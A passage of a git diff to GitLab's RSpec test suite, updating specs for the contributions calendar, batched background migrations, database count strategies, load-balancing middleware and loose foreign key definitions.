'Sydney' - expect(calendar.activity_dates).to eq(today => 3, tomorrow => 2) + expect(calendar.activity_dates).to eq(today => 3, tomorrow => 3) end end it "renders correct event counts within the US Central timezone" do Time.use_zone('UTC') do contributor.timezone = 'Central Time (US & Canada)' - expect(calendar.activity_dates).to eq(yesterday => 2, today => 3) + expect(calendar.activity_dates).to eq(yesterday => 2, today => 4) end end end @@ -169,6 +191,12 @@ RSpec.describe Gitlab::ContributionsCalendar do expect(calendar(contributor).events_by_date(today)).to contain_exactly(e1, e2, e3) end + it "includes diff notes on merge request" do + e1 = create_event(public_project, today, 0, :commented, :diff_note_on_merge_request) + + expect(calendar.events_by_date(today)).to 
contain_exactly(e1) + end + context 'when the user cannot read cross project' do before do allow(Ability).to receive(:allowed?).and_call_original diff --git a/spec/lib/gitlab/daemon_spec.rb b/spec/lib/gitlab/daemon_spec.rb index 075a1e414c7..4d11b0bdc6c 100644 --- a/spec/lib/gitlab/daemon_spec.rb +++ b/spec/lib/gitlab/daemon_spec.rb @@ -46,6 +46,30 @@ RSpec.describe Gitlab::Daemon do expect(subject).to have_received(:run_thread) end + + context '@synchronous' do + context 'when @synchronous is set to true' do + subject { described_class.instance(synchronous: true) } + + it 'calls join on the thread' do + # Thread has to be run in a block, expect_next_instance_of does not support this. + expect_any_instance_of(Thread).to receive(:join) # rubocop:disable RSpec/AnyInstanceOf + + subject.start + end + end + + context 'when @synchronous is not set to a truthy value' do + subject { described_class.instance } + + it 'does not call join on the thread' do + # Thread has to be run in a block, expect_next_instance_of does not support this. 
+ expect_any_instance_of(Thread).not_to receive(:join) # rubocop:disable RSpec/AnyInstanceOf + + subject.start + end + end + end end describe '#stop' do diff --git a/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb b/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb index b4010d0fe8d..7ad3eb395a9 100644 --- a/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb +++ b/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe Gitlab::Database::AsyncIndexes::IndexCreator do + include ExclusiveLeaseHelpers + describe '#perform' do subject { described_class.new(async_index) } @@ -10,7 +12,18 @@ RSpec.describe Gitlab::Database::AsyncIndexes::IndexCreator do let(:index_model) { Gitlab::Database::AsyncIndexes::PostgresAsyncIndex } - let(:connection) { ApplicationRecord.connection } + let(:model) { Gitlab::Database.database_base_models[Gitlab::Database::PRIMARY_DATABASE_NAME] } + let(:connection) { model.connection } + + let!(:lease) { stub_exclusive_lease(lease_key, :uuid, timeout: lease_timeout) } + let(:lease_key) { "gitlab/database/async_indexes/index_creator/#{Gitlab::Database::PRIMARY_DATABASE_NAME}" } + let(:lease_timeout) { described_class::TIMEOUT_PER_ACTION } + + around do |example| + Gitlab::Database::SharedModel.using_connection(connection) do + example.run + end + end context 'when the index already exists' do before do @@ -40,7 +53,7 @@ RSpec.describe Gitlab::Database::AsyncIndexes::IndexCreator do end it 'skips logic if not able to acquire exclusive lease' do - expect(subject).to receive(:try_obtain_lease).and_return(false) + expect(lease).to receive(:try_obtain).ordered.and_return(false) expect(connection).not_to receive(:execute).with(/CREATE INDEX/) expect(async_index).not_to receive(:destroy) diff --git a/spec/lib/gitlab/database/background_migration/batched_job_spec.rb b/spec/lib/gitlab/database/background_migration/batched_job_spec.rb index 0182e0f7651..c4364826ee2 
100644 --- a/spec/lib/gitlab/database/background_migration/batched_job_spec.rb +++ b/spec/lib/gitlab/database/background_migration/batched_job_spec.rb @@ -17,15 +17,19 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedJob, type: :model d let_it_be(:stuck_job) { create(:batched_background_migration_job, status: :pending, updated_at: fixed_time - described_class::STUCK_JOBS_TIMEOUT) } let_it_be(:failed_job) { create(:batched_background_migration_job, status: :failed, attempts: 1) } - before_all do - create(:batched_background_migration_job, status: :failed, attempts: described_class::MAX_ATTEMPTS) - create(:batched_background_migration_job, status: :succeeded) - end + let!(:max_attempts_failed_job) { create(:batched_background_migration_job, status: :failed, attempts: described_class::MAX_ATTEMPTS) } + let!(:succeeded_job) { create(:batched_background_migration_job, status: :succeeded) } before do travel_to fixed_time end + describe '.except_succeeded' do + it 'returns not succeeded jobs' do + expect(described_class.except_succeeded).to contain_exactly(pending_job, running_job, stuck_job, failed_job, max_attempts_failed_job) + end + end + describe '.active' do it 'returns active jobs' do expect(described_class.active).to contain_exactly(pending_job, running_job, stuck_job) diff --git a/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb b/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb index a1c2634f59c..49714cfc4dd 100644 --- a/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb +++ b/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb @@ -23,6 +23,28 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedMigration, type: :m subject { build(:batched_background_migration) } it { is_expected.to validate_uniqueness_of(:job_arguments).scoped_to(:job_class_name, :table_name, :column_name) } + + context 'when there are failed jobs' do + let(:batched_migration) { 
create(:batched_background_migration, status: :active, total_tuple_count: 100) } + let!(:batched_job) { create(:batched_background_migration_job, batched_migration: batched_migration, status: :failed) } + + it 'raises an exception' do + expect { batched_migration.finished! }.to raise_error(ActiveRecord::RecordInvalid) + + expect(batched_migration.reload.status).to eql 'active' + end + end + + context 'when the jobs are completed' do + let(:batched_migration) { create(:batched_background_migration, status: :active, total_tuple_count: 100) } + let!(:batched_job) { create(:batched_background_migration_job, batched_migration: batched_migration, status: :succeeded) } + + it 'finishes the migration' do + batched_migration.finished! + + expect(batched_migration.status).to eql 'finished' + end + end end describe '.queue_order' do @@ -214,14 +236,20 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedMigration, type: :m end end - shared_examples_for 'an attr_writer that demodulizes assigned class names' do |attribute_name| + shared_examples_for 'an attr_writer that assigns class names' do |attribute_name| let(:batched_migration) { build(:batched_background_migration) } context 'when a module name exists' do - it 'removes the module name' do + it 'keeps the class with module name' do + batched_migration.public_send(:"#{attribute_name}=", 'Foo::Bar') + + expect(batched_migration[attribute_name]).to eq('Foo::Bar') + end + + it 'removes leading namespace resolution operator' do batched_migration.public_send(:"#{attribute_name}=", '::Foo::Bar') - expect(batched_migration[attribute_name]).to eq('Bar') + expect(batched_migration[attribute_name]).to eq('Foo::Bar') end end @@ -271,11 +299,11 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedMigration, type: :m end describe '#job_class_name=' do - it_behaves_like 'an attr_writer that demodulizes assigned class names', :job_class_name + it_behaves_like 'an attr_writer that assigns class names', 
:job_class_name end describe '#batch_class_name=' do - it_behaves_like 'an attr_writer that demodulizes assigned class names', :batch_class_name + it_behaves_like 'an attr_writer that assigns class names', :batch_class_name end describe '#migrated_tuple_count' do diff --git a/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb b/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb index 9d49db1f018..e7b9c5fcd02 100644 --- a/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb +++ b/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb @@ -5,24 +5,24 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Count::ReltuplesCountStrategy do before do create_list(:project, 3) - create(:identity) + create_list(:ci_instance_variable, 2) end subject { described_class.new(models).count } describe '#count' do - let(:models) { [Project, Identity] } + let(:models) { [Project, Ci::InstanceVariable] } context 'when reltuples is up to date' do before do - ActiveRecord::Base.connection.execute('ANALYZE projects') - ActiveRecord::Base.connection.execute('ANALYZE identities') + Project.connection.execute('ANALYZE projects') + Ci::InstanceVariable.connection.execute('ANALYZE ci_instance_variables') end it 'uses statistics to do the count' do models.each { |model| expect(model).not_to receive(:count) } - expect(subject).to eq({ Project => 3, Identity => 1 }) + expect(subject).to eq({ Project => 3, Ci::InstanceVariable => 2 }) end end @@ -31,7 +31,7 @@ RSpec.describe Gitlab::Database::Count::ReltuplesCountStrategy do before do models.each do |model| - ActiveRecord::Base.connection.execute("ANALYZE #{model.table_name}") + model.connection.execute("ANALYZE #{model.table_name}") end end @@ -45,7 +45,9 @@ RSpec.describe Gitlab::Database::Count::ReltuplesCountStrategy do context 'insufficient permissions' do it 'returns an empty hash' do - allow(ActiveRecord::Base).to receive(:transaction).and_raise(PG::InsufficientPrivilege) + 
Gitlab::Database.database_base_models.each_value do |base_model| + allow(base_model).to receive(:transaction).and_raise(PG::InsufficientPrivilege) + end expect(subject).to eq({}) end diff --git a/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb b/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb index 2f261aebf02..37d3e13a7ab 100644 --- a/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb +++ b/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb @@ -5,11 +5,12 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Count::TablesampleCountStrategy do before do create_list(:project, 3) + create_list(:ci_instance_variable, 2) create(:identity) create(:group) end - let(:models) { [Project, Identity, Group, Namespace] } + let(:models) { [Project, Ci::InstanceVariable, Identity, Group, Namespace] } let(:strategy) { described_class.new(models) } subject { strategy.count } @@ -20,7 +21,8 @@ RSpec.describe Gitlab::Database::Count::TablesampleCountStrategy do Project => threshold + 1, Identity => threshold - 1, Group => threshold + 1, - Namespace => threshold + 1 + Namespace => threshold + 1, + Ci::InstanceVariable => threshold + 1 } end @@ -43,12 +45,14 @@ RSpec.describe Gitlab::Database::Count::TablesampleCountStrategy do expect(Project).not_to receive(:count) expect(Group).not_to receive(:count) expect(Namespace).not_to receive(:count) + expect(Ci::InstanceVariable).not_to receive(:count) result = subject expect(result[Project]).to eq(3) expect(result[Group]).to eq(1) # 1-Group, 3 namespaces for each project and 3 project namespaces for each project expect(result[Namespace]).to eq(7) + expect(result[Ci::InstanceVariable]).to eq(2) end end diff --git a/spec/lib/gitlab/database/load_balancing/configuration_spec.rb b/spec/lib/gitlab/database/load_balancing/configuration_spec.rb index eef248afdf2..796c14c1038 100644 --- a/spec/lib/gitlab/database/load_balancing/configuration_spec.rb +++ 
b/spec/lib/gitlab/database/load_balancing/configuration_spec.rb @@ -140,6 +140,15 @@ RSpec.describe Gitlab::Database::LoadBalancing::Configuration do end describe '#service_discovery_enabled?' do + it 'returns false when running inside a Rake task' do + allow(Gitlab::Runtime).to receive(:rake?).and_return(true) + + config = described_class.new(ActiveRecord::Base) + config.service_discovery[:record] = 'foo' + + expect(config.service_discovery_enabled?).to eq(false) + end + it 'returns true when a record is configured' do config = described_class.new(ActiveRecord::Base) config.service_discovery[:record] = 'foo' diff --git a/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb b/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb index 37b83729125..3c7819c04b6 100644 --- a/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb @@ -487,25 +487,9 @@ RSpec.describe Gitlab::Database::LoadBalancing::LoadBalancer, :request_store do end end - describe 'primary connection re-use', :reestablished_active_record_base do + describe 'primary connection re-use', :reestablished_active_record_base, :add_ci_connection do let(:model) { Ci::ApplicationRecord } - around do |example| - if Gitlab::Database.has_config?(:ci) - example.run - else - # fake additional Database - model.establish_connection( - ActiveRecord::DatabaseConfigurations::HashConfig.new(Rails.env, 'ci', ActiveRecord::Base.connection_db_config.configuration_hash) - ) - - example.run - - # Cleanup connection_specification_name for Ci::ApplicationRecord - model.remove_connection - end - end - describe '#read' do it 'returns ci replica connection' do expect { |b| lb.read(&b) }.to yield_with_args do |args| diff --git a/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb b/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb index e9bc465b1c7..f05910e5123 100644 --- 
a/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb @@ -4,9 +4,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::LoadBalancing::ServiceDiscovery do let(:load_balancer) do - Gitlab::Database::LoadBalancing::LoadBalancer.new( - Gitlab::Database::LoadBalancing::Configuration.new(ActiveRecord::Base) - ) + configuration = Gitlab::Database::LoadBalancing::Configuration.new(ActiveRecord::Base) + configuration.service_discovery[:record] = 'localhost' + + Gitlab::Database::LoadBalancing::LoadBalancer.new(configuration) end let(:service) do @@ -86,6 +87,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::ServiceDiscovery do service.perform_service_discovery end end + context 'with failures' do before do allow(Gitlab::ErrorTracking).to receive(:track_exception) diff --git a/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb b/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb index de2ad662d16..31be3963565 100644 --- a/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb @@ -5,7 +5,9 @@ require 'spec_helper' RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_gitlab_redis_queues do let(:middleware) { described_class.new } let(:worker) { worker_class.new } - let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'database_replica_location' => '0/D525E3A8' } } + let(:location) {'0/D525E3A8' } + let(:wal_locations) { { Gitlab::Database::MAIN_DATABASE_NAME.to_sym => location } } + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations } } before do skip_feature_flags_yaml_validation @@ -60,9 +62,6 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end shared_examples_for 'replica is up to date' 
do |expected_strategy| - let(:location) {'0/D525E3A8' } - let(:wal_locations) { { Gitlab::Database::MAIN_DATABASE_NAME.to_sym => location } } - it 'does not stick to the primary', :aggregate_failures do expect(ActiveRecord::Base.load_balancer) .to receive(:select_up_to_date_host) @@ -77,9 +76,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ include_examples 'load balancing strategy', expected_strategy end - shared_examples_for 'sticks based on data consistency' do |data_consistency| - include_context 'data consistency worker class', data_consistency, :load_balancing_for_test_data_consistency_worker - + shared_examples_for 'sticks based on data consistency' do context 'when load_balancing_for_test_data_consistency_worker is disabled' do before do stub_feature_flags(load_balancing_for_test_data_consistency_worker: false) @@ -116,23 +113,78 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ it_behaves_like 'replica is up to date', 'replica' end - context 'when legacy wal location is set' do - let(:job) { { 'job_id' => 'a180b47c-3fd6-41b8-81e9-34da61c3400e', 'database_write_location' => '0/D525E3A8' } } + context 'when database location is not set' do + let(:job) { { 'job_id' => 'a180b47c-3fd6-41b8-81e9-34da61c3400e' } } - before do - allow(ActiveRecord::Base.load_balancer) - .to receive(:select_up_to_date_host) - .with('0/D525E3A8') - .and_return(true) - end + include_examples 'stick to the primary', 'primary_no_wal' + end + end - it_behaves_like 'replica is up to date', 'replica' + shared_examples_for 'sleeps when necessary' do + context 'when WAL locations are blank', :freeze_time do + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", "wal_locations" => {}, "created_at" => Time.current.to_f - (described_class::MINIMUM_DELAY_INTERVAL_SECONDS - 0.3) } } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end end - context 'when 
database location is not set' do - let(:job) { { 'job_id' => 'a180b47c-3fd6-41b8-81e9-34da61c3400e' } } + context 'when WAL locations are present', :freeze_time do + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations, "created_at" => Time.current.to_f - elapsed_time } } - include_examples 'stick to the primary', 'primary_no_wal' + context 'when delay interval has not elapsed' do + let(:elapsed_time) { described_class::MINIMUM_DELAY_INTERVAL_SECONDS - 0.3 } + + context 'when replica is up to date' do + before do + Gitlab::Database::LoadBalancing.each_load_balancer do |lb| + allow(lb).to receive(:select_up_to_date_host).and_return(true) + end + end + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end + + context 'when replica is not up to date' do + before do + Gitlab::Database::LoadBalancing.each_load_balancer do |lb| + allow(lb).to receive(:select_up_to_date_host).and_return(false, true) + end + end + + it 'sleeps until the minimum delay is reached' do + expect(middleware).to receive(:sleep).with(be_within(0.01).of(described_class::MINIMUM_DELAY_INTERVAL_SECONDS - elapsed_time)) + + run_middleware + end + end + end + + context 'when delay interval has elapsed' do + let(:elapsed_time) { described_class::MINIMUM_DELAY_INTERVAL_SECONDS + 0.3 } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end + + context 'when created_at is in the future' do + let(:elapsed_time) { -5 } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end end end @@ -146,10 +198,24 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ include_context 'data consistency worker class', :always, :load_balancing_for_test_data_consistency_worker include_examples 'stick to the primary', 'primary' + + context 'when delay interval has not elapsed', :freeze_time do + 
let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations, "created_at" => Time.current.to_f - elapsed_time } } + let(:elapsed_time) { described_class::MINIMUM_DELAY_INTERVAL_SECONDS - 0.3 } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end end context 'when worker data consistency is :delayed' do - include_examples 'sticks based on data consistency', :delayed + include_context 'data consistency worker class', :delayed, :load_balancing_for_test_data_consistency_worker + + include_examples 'sticks based on data consistency' + include_examples 'sleeps when necessary' context 'when replica is not up to date' do before do @@ -177,7 +243,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end context 'when job is retried' do - let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'database_replica_location' => '0/D525E3A8', 'retry_count' => 0 } } + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations, 'retry_count' => 0 } } context 'and replica still lagging behind' do include_examples 'stick to the primary', 'primary' @@ -195,7 +261,10 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end context 'when worker data consistency is :sticky' do - include_examples 'sticks based on data consistency', :sticky + include_context 'data consistency worker class', :sticky, :load_balancing_for_test_data_consistency_worker + + include_examples 'sticks based on data consistency' + include_examples 'sleeps when necessary' context 'when replica is not up to date' do before do @@ -255,7 +324,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end def run_middleware - middleware.call(worker, job, double(:queue)) { yield } + middleware.call(worker, job, double(:queue)) { yield if block_given? 
} rescue described_class::JobReplicaNotUpToDate # we silence errors here that cause the job to retry end diff --git a/spec/lib/gitlab/database/load_balancing/sticking_spec.rb b/spec/lib/gitlab/database/load_balancing/sticking_spec.rb index d88554614cf..f3139bb1b4f 100644 --- a/spec/lib/gitlab/database/load_balancing/sticking_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/sticking_spec.rb @@ -256,15 +256,6 @@ RSpec.describe Gitlab::Database::LoadBalancing::Sticking, :redis do expect(sticking.last_write_location_for(:user, 4)).to be_nil end - - it 'removes the old key' do - Gitlab::Redis::SharedState.with do |redis| - redis.set(sticking.send(:old_redis_key_for, :user, 4), 'foo', ex: 30) - end - - sticking.unstick(:user, 4) - expect(sticking.last_write_location_for(:user, 4)).to be_nil - end end describe '#last_write_location_for' do @@ -273,14 +264,6 @@ RSpec.describe Gitlab::Database::LoadBalancing::Sticking, :redis do expect(sticking.last_write_location_for(:user, 4)).to eq('foo') end - - it 'falls back to reading the old key' do - Gitlab::Redis::SharedState.with do |redis| - redis.set(sticking.send(:old_redis_key_for, :user, 4), 'foo', ex: 30) - end - - expect(sticking.last_write_location_for(:user, 4)).to eq('foo') - end end describe '#redis_key_for' do diff --git a/spec/lib/gitlab/database/load_balancing_spec.rb b/spec/lib/gitlab/database/load_balancing_spec.rb index 65ffe539910..45878b2e266 100644 --- a/spec/lib/gitlab/database/load_balancing_spec.rb +++ b/spec/lib/gitlab/database/load_balancing_spec.rb @@ -38,6 +38,24 @@ RSpec.describe Gitlab::Database::LoadBalancing do end end + describe '.primary_only?' 
do + it 'returns true if all load balancers have no replicas' do + described_class.each_load_balancer do |lb| + allow(lb).to receive(:primary_only?).and_return(true) + end + + expect(described_class.primary_only?).to eq(true) + end + + it 'returns false if at least one has replicas' do + described_class.each_load_balancer.with_index do |lb, index| + allow(lb).to receive(:primary_only?).and_return(index != 0) + end + + expect(described_class.primary_only?).to eq(false) + end + end + describe '.release_hosts' do it 'releases the host of every load balancer' do described_class.each_load_balancer do |lb| diff --git a/spec/lib/gitlab/database/loose_foreign_keys_spec.rb b/spec/lib/gitlab/database/loose_foreign_keys_spec.rb new file mode 100644 index 00000000000..13f2d31bc32 --- /dev/null +++ b/spec/lib/gitlab/database/loose_foreign_keys_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::LooseForeignKeys do + describe 'verify all definitions' do + subject(:definitions) { described_class.definitions } + + it 'all definitions have assigned a known gitlab_schema and on_delete' do + is_expected.to all(have_attributes( + options: a_hash_including( + column: be_a(String), + gitlab_schema: be_in(Gitlab::Database.schemas_to_base_models.symbolize_keys.keys), + on_delete: be_in([:async_delete, :async_nullify]) + ), + from_table: be_a(String), + to_table: be_a(String) + )) + end + + describe 'ensuring database integrity' do + def base_models_for(table) + parent_table_schema = Gitlab::Database::GitlabSchema.table_schema(table) + Gitlab::Database.schemas_to_base_models.fetch(parent_table_schema) + end + + it 'all `to_table` tables are present' do + definitions.each do |definition| + base_models_for(definition.to_table).each do |model| + expect(model.connection).to be_table_exist(definition.to_table) + end + end + end + + it 'all `from_table` tables are present' do + definitions.each do |definition| + 
base_models_for(definition.from_table).each do |model| + expect(model.connection).to be_table_exist(definition.from_table) + expect(model.connection).to be_column_exist(definition.from_table, definition.column) + end + end + end + end + end +end diff --git a/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb b/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb index f1dbfbbff18..25fc676d09e 100644 --- a/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb +++ b/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb @@ -47,11 +47,16 @@ RSpec.describe Gitlab::Database::MigrationHelpers::LooseForeignKeyHelpers do record_to_be_deleted.delete expect(LooseForeignKeys::DeletedRecord.count).to eq(1) - deleted_record = LooseForeignKeys::DeletedRecord.all.first + + arel_table = LooseForeignKeys::DeletedRecord.arel_table + deleted_record = LooseForeignKeys::DeletedRecord + .select(arel_table[Arel.star], arel_table[:partition].as('partition_number')) # aliasing the ignored partition column to partition_number + .all + .first expect(deleted_record.primary_key_value).to eq(record_to_be_deleted.id) expect(deleted_record.fully_qualified_table_name).to eq('public._test_loose_fk_test_table') - expect(deleted_record.partition).to eq(1) + expect(deleted_record.partition_number).to eq(1) end it 'stores multiple record deletions' do diff --git a/spec/lib/gitlab/database/migration_helpers_spec.rb b/spec/lib/gitlab/database/migration_helpers_spec.rb index ea755f5a368..7f80bed04a4 100644 --- a/spec/lib/gitlab/database/migration_helpers_spec.rb +++ b/spec/lib/gitlab/database/migration_helpers_spec.rb @@ -2431,7 +2431,7 @@ RSpec.describe Gitlab::Database::MigrationHelpers do let(:issues) { table(:issues) } def setup - namespace = namespaces.create!(name: 'foo', path: 'foo') + namespace = namespaces.create!(name: 'foo', path: 'foo', type: Namespaces::UserNamespace.sti_name) 
projects.create!(namespace_id: namespace.id) end diff --git a/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb b/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb index e42a6c970ea..99c7d70724c 100644 --- a/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb +++ b/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb @@ -7,78 +7,6 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do ActiveRecord::Migration.new.extend(described_class) end - describe '#bulk_queue_background_migration_jobs_by_range' do - context 'when the model has an ID column' do - let!(:id1) { create(:user).id } - let!(:id2) { create(:user).id } - let!(:id3) { create(:user).id } - - before do - User.class_eval do - include EachBatch - end - end - - context 'with enough rows to bulk queue jobs more than once' do - before do - stub_const('Gitlab::Database::Migrations::BackgroundMigrationHelpers::JOB_BUFFER_SIZE', 1) - end - - it 'queues jobs correctly' do - Sidekiq::Testing.fake! do - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - - expect(BackgroundMigrationWorker.jobs[0]['args']).to eq(['FooJob', [id1, id2]]) - expect(BackgroundMigrationWorker.jobs[1]['args']).to eq(['FooJob', [id3, id3]]) - end - end - - it 'queues jobs in groups of buffer size 1' do - expect(BackgroundMigrationWorker).to receive(:bulk_perform_async).with([['FooJob', [id1, id2]]]) - expect(BackgroundMigrationWorker).to receive(:bulk_perform_async).with([['FooJob', [id3, id3]]]) - - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - end - end - - context 'with not enough rows to bulk queue jobs more than once' do - it 'queues jobs correctly' do - Sidekiq::Testing.fake! 
do - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - - expect(BackgroundMigrationWorker.jobs[0]['args']).to eq(['FooJob', [id1, id2]]) - expect(BackgroundMigrationWorker.jobs[1]['args']).to eq(['FooJob', [id3, id3]]) - end - end - - it 'queues jobs in bulk all at once (big buffer size)' do - expect(BackgroundMigrationWorker).to receive(:bulk_perform_async).with([['FooJob', [id1, id2]], - ['FooJob', [id3, id3]]]) - - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - end - end - - context 'without specifying batch_size' do - it 'queues jobs correctly' do - Sidekiq::Testing.fake! do - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob') - - expect(BackgroundMigrationWorker.jobs[0]['args']).to eq(['FooJob', [id1, id3]]) - end - end - end - end - - context "when the model doesn't have an ID column" do - it 'raises error (for now)' do - expect do - model.bulk_queue_background_migration_jobs_by_range(ProjectAuthorization, 'FooJob') - end.to raise_error(StandardError, /does not have an ID/) - end - end - end - describe '#queue_background_migration_jobs_by_range_at_intervals' do context 'when the model has an ID column' do let!(:id1) { create(:user).id } @@ -354,161 +282,6 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do end end - describe '#queue_batched_background_migration' do - let(:pgclass_info) { instance_double('Gitlab::Database::PgClass', cardinality_estimate: 42) } - - before do - allow(Gitlab::Database::PgClass).to receive(:for_table).and_call_original - end - - context 'when such migration already exists' do - it 'does not create duplicate migration' do - create( - :batched_background_migration, - job_class_name: 'MyJobClass', - table_name: :projects, - column_name: :id, - interval: 10.minutes, - min_value: 5, - max_value: 1005, - batch_class_name: 'MyBatchClass', - batch_size: 200, - sub_batch_size: 20, - job_arguments: [[:id], 
[:id_convert_to_bigint]] - ) - - expect do - model.queue_batched_background_migration( - 'MyJobClass', - :projects, - :id, - [:id], [:id_convert_to_bigint], - job_interval: 5.minutes, - batch_min_value: 5, - batch_max_value: 1000, - batch_class_name: 'MyBatchClass', - batch_size: 100, - sub_batch_size: 10) - end.not_to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count } - end - end - - it 'creates the database record for the migration' do - expect(Gitlab::Database::PgClass).to receive(:for_table).with(:projects).and_return(pgclass_info) - - expect do - model.queue_batched_background_migration( - 'MyJobClass', - :projects, - :id, - job_interval: 5.minutes, - batch_min_value: 5, - batch_max_value: 1000, - batch_class_name: 'MyBatchClass', - batch_size: 100, - sub_batch_size: 10) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( - job_class_name: 'MyJobClass', - table_name: 'projects', - column_name: 'id', - interval: 300, - min_value: 5, - max_value: 1000, - batch_class_name: 'MyBatchClass', - batch_size: 100, - sub_batch_size: 10, - job_arguments: %w[], - status: 'active', - total_tuple_count: pgclass_info.cardinality_estimate) - end - - context 'when the job interval is lower than the minimum' do - let(:minimum_delay) { described_class::BATCH_MIN_DELAY } - - it 'sets the job interval to the minimum value' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: minimum_delay - 1.minute) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last - - expect(created_migration.interval).to eq(minimum_delay) - end - end - - context 'when additional arguments are passed to the method' do - it 'saves the arguments on the database record' do - expect do - 
